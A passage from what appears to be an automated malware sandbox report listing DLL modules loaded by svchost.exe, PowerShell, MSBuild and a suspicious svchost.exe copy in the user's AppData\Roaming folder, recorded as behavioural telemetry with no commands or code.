Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
